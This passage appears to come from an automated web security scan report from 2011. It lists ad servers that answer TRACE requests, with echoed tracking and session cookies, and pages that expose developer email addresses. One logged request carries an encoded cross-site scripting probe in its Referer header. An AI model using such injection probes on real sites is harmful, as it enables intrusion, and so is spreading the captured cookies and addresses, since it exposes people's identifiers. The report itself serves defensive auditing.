   document.write('<script src="http://bpx.a9.com/amzn/defaultad.js"></script>
...[SNIP]...

20. TRACE method is enabled previous next
There are 6 instances of this issue:

http://ads.pubmatic.com/
http://d.xp1.ru4.com/
http://dg.specificclick.net/
http://m.xp1.ru4.com/
http://secure-us.imrworldwide.com/
http://track1000.pubmatic.com/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

20.1. http://ads.pubmatic.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pubmatic.com
Path:	/

Request

TRACE / HTTP/1.0
Host: ads.pubmatic.com
Cookie: 9c54640fe1a815fe

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Mon, 13 Jun 2011 11:19:34 GMT
Content-Type: message/http
Content-Length: 1164
Expires: Mon, 13 Jun 2011 11:19:34 GMT
Connection: close

TRACE / HTTP/1.0
Host: ads.pubmatic.com
Cookie: 9c54640fe1a815fe; KADUSERCOOKIE=AFFBE250-9A12-4532-ADE8-267A400F31BA; KRTBCOOKIE_57=476-uid:3420415245200633085; KRTBCOOKIE_58=1344-AG-00000001389358554; KRTBCOOKIE_22=488-pcv:1|uid:4325897289836481830; KRTBCOOKIE_97=
...[SNIP]...

20.2. http://d.xp1.ru4.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/

Request

TRACE / HTTP/1.0
Host: d.xp1.ru4.com
Cookie: b7f8746eeb14f574

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 13 Jun 2011 11:09:09 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: d.xp1.ru4.com
Cookie: b7f8746eeb14f574; X1ID=AG-00000001389358554; C1780853=0@4; M62795-747980=1; M62795-52787=1; M62795-97956=1; P37257=c3N2X2J8YzF8MTMwNjUyNDkyNHxzc3ZfYzF8WXwxMzA2NTI0OTI0fA==; M62795-747979=1; O1807966=4112; P1807966=c3N
...[SNIP]...

20.3. http://dg.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dg.specificclick.net
Path:	/

Request

TRACE / HTTP/1.0
Host: dg.specificclick.net
Cookie: 3c5bb3b731b11f44

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: message/http
Content-Length: 189
Date: Mon, 13 Jun 2011 11:13:31 GMT
Connection: close

TRACE / HTTP/1.0
host: dg.specificclick.net
cookie: 3c5bb3b731b11f44; JSESSIONID=8b427d775a2d0d054b4244fa1880; adp=7qHV^0^3; smdmp=7qEy:811200901^7qEy:1; adf=7qHV^0^0; ug=FiMiv7kDK4v9CD

20.4. http://m.xp1.ru4.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.xp1.ru4.com
Path:	/

Request

TRACE / HTTP/1.0
Host: m.xp1.ru4.com
Cookie: 3c8f80f6238b2021

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 13 Jun 2011 11:11:08 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: m.xp1.ru4.com
Cookie: 3c8f80f6238b2021; X1ID=AG-00000001389358554; C1780853=0@4; M62795-747980=1; M62795-52787=1; M62795-97956=1; P37257=c3N2X2J8YzF8MTMwNjUyNDkyNHxzc3ZfYzF8WXwxMzA2NTI0OTI0fA==; M62795-747979=1; O1807966=4112; P1807966=c3N
...[SNIP]...

20.5. http://secure-us.imrworldwide.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/

Request

TRACE / HTTP/1.0
Host: secure-us.imrworldwide.com
Cookie: 3857b584866beb44

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:24:18 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 3857b584866beb44; V5=AStfNgpFIF5WEhozICIjIyE6KkIkO1InHlKWAw__; IMRID=Tc1h14psGhMAAHNb-FY
Host: secure-us.imrworldwide.com

20.6. http://track1000.pubmatic.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://track1000.pubmatic.com
Path:	/

Request

TRACE / HTTP/1.0
Host: track1000.pubmatic.com
Cookie: 735ef40ac8137274

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:19:39 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: track1000.pubmatic.com
Cookie: 735ef40ac8137274; KADUSERCOOKIE=AFFBE250-9A12-4532-ADE8-267A400F31BA; KRTBCOOKIE_57=476-uid:3420415245200633085; KRTBCOOKIE_58=1344-AG-00000001389358554; KRTBCOOKIE_22=488-pcv:1|uid:4325897289836481830; KRTBCOOKIE_97=
...[SNIP]...

21. Email addresses disclosed previous next
There are 28 instances of this issue:

http://ads.adbrite.com/adserver/vdi/742697
http://fastcache.gawkerassets.com/assets/base.v10/static/base.v10.widget.s20110610a.js
http://idolator.com/wp-content/plugins/wpaudio-mp3-player/wpaudio.js
http://img.timeinc.net/tii/omniture/h/common.js
http://img.timeinc.net/time/rd/trunk/www/web/feds/j/mobileExperience.js
https://login.yahoo.com/config/login_verify2
http://mediacdn.disqus.com/1307735099/build/system/disqus.js
http://s.meebocdn.net/cim/script/cim_v92_cim_11_10_2.en.js
http://sportdfw.com/aboutcontact-us/
http://sportdfw.com/wp-content/plugins/wp-recaptcha/recaptcha.css
http://thesouthern.com/content/tncms/live/global/resources/scripts/common.js
http://thesouthern.com/content/tncms/live/global/resources/scripts/facebox.js
http://thesouthern.com/content/tncms/live/global/resources/scripts/port-comments.js
http://thesouthern.com/content/tncms/live/global/resources/styles/skin.css
http://widgets3.flux.com/Widget/ContentAction/3023/en-US
http://www.hbo.com/utils/js/jquery/plugins/jquery.cookie.js
http://www.mavgear.com/skin1/menu.js
http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us
http://www.mavsmoneyball.com/fanposts
http://www.mavsmoneyball.com/mavericks-tickets
http://www.mtv.com/global/music/modules/followUs/js/index.jhtml
http://www.nba.com/js/controls.js
http://www.nba.com/js/cookieFunctions.js
http://www.nba.com/js/dragdrop.js
http://www.twackle.com/
http://www.twackle.com/headlines
http://www.twackle.com/javascripts/all.js

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

21.1. http://ads.adbrite.com/adserver/vdi/742697 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/742697

Issue detail

The following email address was disclosed in the response:

4df5f0ab@cdn.turn.com

Request

Response

21.2. http://fastcache.gawkerassets.com/assets/base.v10/static/base.v10.widget.s20110610a.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fastcache.gawkerassets.com
Path:	/assets/base.v10/static/base.v10.widget.s20110610a.js

Issue detail

The following email address was disclosed in the response:

help@gawker.com

Request

GET /assets/base.v10/static/base.v10.widget.s20110610a.js HTTP/1.1
Host: fastcache.gawkerassets.com
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/x-javascript
Date: Mon, 13 Jun 2011 11:18:16 GMT
ETag: "67988e3-31843-27abfe00+gzip"
Expires: Mon, 13 Jun 2011 11:23:16 GMT
GawkerApplication: ganja
GawkerApplicationHost: PEST-45
GawkerHost: GM40 - D=1427 t=1307715196833378
Last-Modified: Fri, 10 Jun 2011 14:12:08 GMT
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Server: ECS (dca/53C5)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 202819

(function(a){a.widget("ui.AdRobot",{ptile:0,status:{},marquee_running:false,marquee_config:null,interstitial_running:false,previous_skin_css_url:"",queued_ads:{},debug_mode:false,initialize:function()
...[SNIP]...
<a href="mailto:help@gawker.com">help@gawker.com</a>
...[SNIP]...
<a href="help@gawker.com">help@gawker.com</a>
...[SNIP]...
<a href="mailto:help@gawker.com">help@gawker.com</a>
...[SNIP]...
<a href="mailto:help@gawker.com">help@gawker.com</a>
...[SNIP]...

21.3. http://idolator.com/wp-content/plugins/wpaudio-mp3-player/wpaudio.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/wpaudio-mp3-player/wpaudio.js

Issue detail

The following email address was disclosed in the response:

t@ticeton.com

Request

GET /wp-content/plugins/wpaudio-mp3-player/wpaudio.js HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:32:28 GMT
Server: Apache
Last-Modified: Mon, 02 May 2011 22:58:26 GMT
ETag: "18c1-4a252f60e6880"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 6337
Content-Type: application/x-javascript

// WPaudio WordPress MP3 Player Plugin by Todd Iceton (t@ticeton.com)
soundManager.debugMode = false;
soundManager.url = wpa_url + '/sm2/';
soundManager.nullURL = wpa_url + '/sm2/null.mp3';
soundManager.useHighPerformance = true;
soundManager.useFastPolling = false;
so
...[SNIP]...

21.4. http://img.timeinc.net/tii/omniture/h/common.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.timeinc.net
Path:	/tii/omniture/h/common.js

Issue detail

The following email address was disclosed in the response:

id@Us.tc

Request

GET /tii/omniture/h/common.js HTTP/1.1
Host: img.timeinc.net
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 05 Oct 2010 14:05:35 GMT
ETag: "7776-4cab30af"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 30582
Date: Mon, 13 Jun 2011 11:17:59 GMT
Connection: close

/* SiteCatalyst code version: H.20.2. / 8-19-09
Copyright 1997-2005 Omniture, Inc. More info available at
http://www.omniture.com */
var s_time=s_gi(s_account)
/************************** CONFIG S
...[SNIP]...
=s.mr($8,(vt#Wt`Zvt)`ks.hav()+q+(qs?qs:s.rq(^5)),0,i"
+"d,ta);qs`l;`Rm('t')`5s.p_r)s.p_r(`I`a`l}^I(qs);^Q`u($0;`m$0`b^1,`G$L1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`j''`5s.pg)`H^x@M=`H^xeo=`H^x`Q`r=`H^x`Q^2`l`5!id@Us.tc^ztc=1;s.flush`T()}`3#6`Ctl`0o,t,n,vo`1;s.@M="
+"$Co`I`Q^2=t;s.`Q`r=n;s.t($0}`5pg){`H^xco`0o){`P^t\"_\",1,$a`3$Co)`Cwd^xgs`0u@t`P^tun,1,$a`3s.t()`Cwd^xdc`0u@t`P^tun,$a`3s.t()}}@8=(`H`M`h`9`4$Bs@H0`Id=
...[SNIP]...

21.5. http://img.timeinc.net/time/rd/trunk/www/web/feds/j/mobileExperience.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.timeinc.net
Path:	/time/rd/trunk/www/web/feds/j/mobileExperience.js

Issue detail

The following email address was disclosed in the response:

ahand@hand-interactive.com

Request

GET /time/rd/trunk/www/web/feds/j/mobileExperience.js HTTP/1.1
Host: img.timeinc.net
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 03 May 2010 19:09:29 GMT
ETag: "2b76-4bdf1f69"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 11126
Date: Mon, 13 Jun 2011 11:17:57 GMT
Connection: close

/**********************************************************************************************************************/
/****************************************** MOBILE BROWSER DETECTION COD
...[SNIP]...
*******************************/
/**********************************************************************************************************************/

// JavaScript Document

// Anthony Hand, ahand@hand-interactive.com
// Web: www.hand-interactive.com
//
// License info: http://creativecommons.org/licenses/by/3.0/us/

//Initialize some initial string variables we'll look for later.
var deviceIphone = "iphone"
...[SNIP]...

21.6. https://login.yahoo.com/config/login_verify2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.yahoo.com
Path:	/config/login_verify2

Issue detail

The following email address was disclosed in the response:

free2rhyme@yahoo.com

Request

Response

21.7. http://mediacdn.disqus.com/1307735099/build/system/disqus.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mediacdn.disqus.com
Path:	/1307735099/build/system/disqus.js

Issue detail

The following email address was disclosed in the response:

anton@disqus.com

Request

Response

21.8. http://s.meebocdn.net/cim/script/cim_v92_cim_11_10_2.en.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.meebocdn.net
Path:	/cim/script/cim_v92_cim_11_10_2.en.js

Issue detail

The following email address was disclosed in the response:

ad-feedback@meebo-inc.com

Request

GET /cim/script/cim_v92_cim_11_10_2.en.js?1306966024 HTTP/1.1
Host: s.meebocdn.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Accept-Ranges: bytes
ETag: "116414641"
Last-Modified: Thu, 26 May 2011 21:18:05 GMT
Date: Mon, 13 Jun 2011 11:01:13 GMT
Server: lighttpd/1.4.19
Vary: Accept-Encoding
Cache-Control: private, max-age=604800
Age: 452510
Expires: Wed, 15 Jun 2011 05:19:23 GMT
Content-Length: 252959
Connection: Keep-Alive

// Copyright 2005-2010 Meebo, inc.
//
// RSA javascript implementation Copyright 1998-2005 David Shapiro
// please see http://www.ohdave.com/rsa/
// SHA256 javascript implementation Copyright 2003-200
...[SNIP]...
<a href="mailto:ad-feedback@meebo-inc.com?subject='+
encodeURIComponent("Comment about: "+this.m_ad.getProp("share"))+
'" class="meebo-0 meebo-292">
...[SNIP]...

21.9. http://sportdfw.com/aboutcontact-us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportdfw.com
Path:	/aboutcontact-us/

Issue detail

The following email address was disclosed in the response:

sportdfw@gmail.com

Request

Response

21.10. http://sportdfw.com/wp-content/plugins/wp-recaptcha/recaptcha.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportdfw.com
Path:	/wp-content/plugins/wp-recaptcha/recaptcha.css

Issue detail

The following email addresses were disclosed in the response:

haha@lol.com
ohnoes@pwnies.com

Request

GET /wp-content/plugins/wp-recaptcha/recaptcha.css HTTP/1.1
Host: sportdfw.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:01:02 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Phusion_Passenger/2.2.15 mod_bwlimited/1.4 PHP/5.2.15
Last-Modified: Sun, 22 May 2011 14:34:00 GMT
ETag: "164409b-6cb-4a3de3ee36600"
Accept-Ranges: bytes
Content-Length: 1739
Content-Type: text/css

/* RECAPTCHA STYLING */
.recaptcha-error {
font-size: 1.8em;
padding-bottom: 8px;
}
/* END RECAPTCHA STYLING */

/* MAILHIDE STYLING */

/* This is for plain text emails i.e. haha@lol.com - TEXT*/
.mh-plaintext {
background:transparent url(email.png) no-repeat scroll left center;
border:medium none;
color:#2277DD;
height:16px;
padding:2px 2px 4px 20px;
}

/* This is for plain text emails i.e. haha@lol.com - DOTS*/
.mh-plaintext a, .mh-plaintext a:hover, .mh-plaintext a:visited, .mh-plaintext a:visited:hover {
color: #FF7700;
font-weight: bolder;
text-decoration: none;
border: 0;
backgrou
...[SNIP]...
<a href="mailto:ohnoes@pwnies.com">
...[SNIP]...
<a href="mailto:ohnoes@pwnies.com">
...[SNIP]...

21.11. http://thesouthern.com/content/tncms/live/global/resources/scripts/common.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://thesouthern.com
Path:	/content/tncms/live/global/resources/scripts/common.js

Issue detail

The following email address was disclosed in the response:

ryan.davis@lee.net

Request

Response

21.12. http://thesouthern.com/content/tncms/live/global/resources/scripts/facebox.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://thesouthern.com
Path:	/content/tncms/live/global/resources/scripts/facebox.js

Issue detail

The following email address was disclosed in the response:

chris@ozmm.org

Request

GET /content/tncms/live/global/resources/scripts/facebox.js HTTP/1.1
Host: thesouthern.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Content-Type: application/x-javascript
Date: Mon, 13 Jun 2011 10:59:01 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
ETag: "59428429"
Last-Modified: Mon, 24 Aug 2009 21:47:18 GMT
Real-Hostname: thesouthern.com
Connection: Keep-Alive
X-Cache-Info: cached
Content-Length: 9423

/*
* Facebox (for jQuery)
* version: 1.2 (05/05/2008)
* @requires jQuery v1.2 or later
*
* Examples at http://famspam.com/facebox/
*
* Licensed under the MIT:
* http://www.opensource.org/licenses/mit-license.php
*
* Copyright 2007, 2008 Chris Wanstrath [ chris@ozmm.org ]
*
* Usage:
*
* jQuery(document).ready(function() {
* jQuery('a[rel*=facebox]').facebox()
* })
*
* <a href="#terms" rel="facebox">
...[SNIP]...

21.13. http://thesouthern.com/content/tncms/live/global/resources/scripts/port-comments.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://thesouthern.com
Path:	/content/tncms/live/global/resources/scripts/port-comments.js

Issue detail

The following email address was disclosed in the response:

rdavis@qctimes.com

Request

GET /content/tncms/live/global/resources/scripts/port-comments.js HTTP/1.1
Host: thesouthern.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Content-Type: application/x-javascript
Date: Mon, 13 Jun 2011 10:59:01 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
ETag: "56286957"
Last-Modified: Wed, 16 Sep 2009 02:39:39 GMT
Real-Hostname: thesouthern.com
Connection: Keep-Alive
X-Cache-Info: cached
Content-Length: 4466

/*
   Port Comment API JS
   Last Update: 3/30/2009
   Author: Ryan Davis <rdavis@qctimes.com>
*/

j = jQuery.noConflict();

j(document).ready(function()
{
   // vars used for bulk request
   var bulkIDs = '';
...[SNIP]...

21.14. http://thesouthern.com/content/tncms/live/global/resources/styles/skin.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://thesouthern.com
Path:	/content/tncms/live/global/resources/styles/skin.css

Issue detail

The following email address was disclosed in the response:

rdavis@qctimes.com

Request

GET /content/tncms/live/global/resources/styles/skin.css? HTTP/1.1
Host: thesouthern.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Content-Type: text/css
Date: Mon, 13 Jun 2011 10:58:48 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
ETag: "1702677101"
Last-Modified: Wed, 04 May 2011 15:15:09 GMT
Real-Hostname: thesouthern.com
Connection: Keep-Alive
X-Cache-Info: cached
Content-Length: 36832

/*
   LEE BASE CSS
   Author: Ryan Davis <rdavis@qctimes.com>
   Last Update: 08/17/2009
*/
@import url('reset_960.css');
@import url('facebox.css');

body {
   font-size: 13px;
   text-align: center;
   backgro
...[SNIP]...

21.15. http://widgets3.flux.com/Widget/ContentAction/3023/en-US previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://widgets3.flux.com
Path:	/Widget/ContentAction/3023/en-US

Issue detail

The following email address was disclosed in the response:

support@flux.com

Request

GET /Widget/ContentAction/3023/en-US HTTP/1.1
Host: widgets3.flux.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
Last-Modified: Wed, 09 Dec 2009 10:46:44 GMT
Server: Microsoft-IIS/7.0
Server: w08g3
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg3
Content-Length: 130029
Cache-Control: public, max-age=414
Expires: Mon, 13 Jun 2011 11:25:30 GMT
Date: Mon, 13 Jun 2011 11:18:36 GMT
Connection: close
Vary: Accept-Encoding

Flux.widgets['ContentAction3023'] = Flux.widgets['ContentAction3023'] || {};
Flux.widgets['ContentAction3023'].frameworkVersion = 3007;
Flux.widgets['ContentAction3023'].controls = {
   "BadgeNotific
...[SNIP]...
ntNotAvailable": "We...re sorry! Due to system maintenance, this content is not available.",
   "msgExpectedError": "We are unable to complete your action. If you think this is in error, please contact support@flux.com for assistance and reference error code \"{ERROR_CODE}\".",
   "msgFunctionNotAvailable": "This function is not available due to system maintenance. Please try again later.",
   "msgFunctionNotAvailable
...[SNIP]...

21.16. http://www.hbo.com/utils/js/jquery/plugins/jquery.cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hbo.com
Path:	/utils/js/jquery/plugins/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.unused.de

Request

GET /utils/js/jquery/plugins/jquery.cookie.js HTTP/1.1
Host: www.hbo.com
Proxy-Connection: keep-alive
Referer: http://www.hbo.com/game-of-thrones/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:18:38 GMT
Server: Apache
Last-Modified: Tue, 26 Apr 2011 01:34:17 GMT
ETag: "40dc-110a-4a1c85287b840"
Accept-Ranges: bytes
Content-Length: 4362
Cache-Control: max-age=60
Expires: Mon, 13 Jun 2011 11:19:38 GMT
g: u
Content-Type: application/javascript

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.unused.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://w
...[SNIP]...
ll be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.unused.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.unused.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

21.17. http://www.mavgear.com/skin1/menu.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mavgear.com
Path:	/skin1/menu.js

Issue detail

The following email address was disclosed in the response:

marco@i-marco.nl

Request

GET /skin1/menu.js HTTP/1.1
Host: www.mavgear.com
Proxy-Connection: keep-alive
Referer: http://www.mavgear.com/?utm_campaign=finals&utm_medium=splash&utm_source=mavsdotcom&utm_content=champs&utm_term=mavgear
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xid=612450a171f9b2a6cb69ac0fcabd6f82; RefererCookie=http%3A%2F%2Fwww.nba.com%2Fmavericks%2Fplayoffs%2F2011_nba_finals_champions.html; store_language=en

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:10:58 GMT
Server: Apache/2.2.17 (Atomic)
Last-Modified: Thu, 30 Sep 2010 22:44:58 GMT
ETag: "6c2ab84-739-49181d3db0e80"
Accept-Ranges: bytes
Content-Length: 1849
Connection: close
Content-Type: application/x-javascript

/*
Simple JQuery menu.
HTML structure to use:

Notes:

1: each menu MUST have an ID set. It doesn't matter what this ID is as long as it's there.
2: each menu MUST have a class 'menu' set. If the me
...[SNIP]...
</ul>

Copyright 2008 by Marco van Hylckama Vlieg

web: http://www.i-marco.nl/weblog/
email: marco@i-marco.nl

Free for non-commercial use
*/

function initMenus() {
   $('ul.menu ul').hide();
   $.each($('ul.menu'), function(){
       $('#' + this.id + 'li ul.open').show();
   });
   $('ul.menu li a').click(
       function()
...[SNIP]...

